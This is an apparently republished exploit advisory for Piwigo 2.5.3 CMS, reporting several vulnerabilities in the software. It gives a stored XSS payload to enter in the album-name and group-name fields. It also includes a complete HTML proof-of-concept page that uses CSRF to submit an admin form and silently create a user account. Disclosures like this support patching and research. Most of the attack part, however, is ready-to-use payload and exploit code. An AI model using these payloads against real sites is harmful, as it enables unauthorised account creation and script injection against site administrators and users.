扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 |
########################################################### [~] Exploit Title: Piwigo 2.5.3 CMS:Multiple vulnerability's [~] Author: sajith [~] version: Piwigo 2.5.3 [~]Vendor Homepage: http://piwigo.org [~] vulnerable app link:http://www.piwigo.org/basics/downloads ########################################################### [1] Stored XSS on Multiple parameters <1> click on Add photos ( http://127.0.0.1/cms/piwigo/admin.php?page=photos_add) and click on "create new album" in the album name enter the payload "><img src=x onerror=prompt(1);> and save it we can see that our payload gets executed.we can also see that when you click on "albums" and "manage" functionality payload gets executed. <2>click on users > groups > in the "group name" field add above xss payload and click on save. [2] CSRF vulnerability click on >users >managewhere "add a user " functionality can be exploited using CSRF vulnerability(poc shown below) <head> <title>POC by sajith shetty</title> </head> <body> <form action="http://127.0.0.1/cms/piwigo/admin.php?page=user_list" id="formid" method="post"> <input type="hidden" name="login" value="crsfpoc123" /> <input type="hidden" name="password" value="Password123@" /> <input type="hidden" name="email" value="xyz@aaww.com" /> <input type="hidden" name="send_password_by_mail" value="1" /> <input type="hidden" name="submit_add" value="Submit" /> </form> <script> document.getElementById('formid').submit(); </script> </body> </html> |
体验盒子
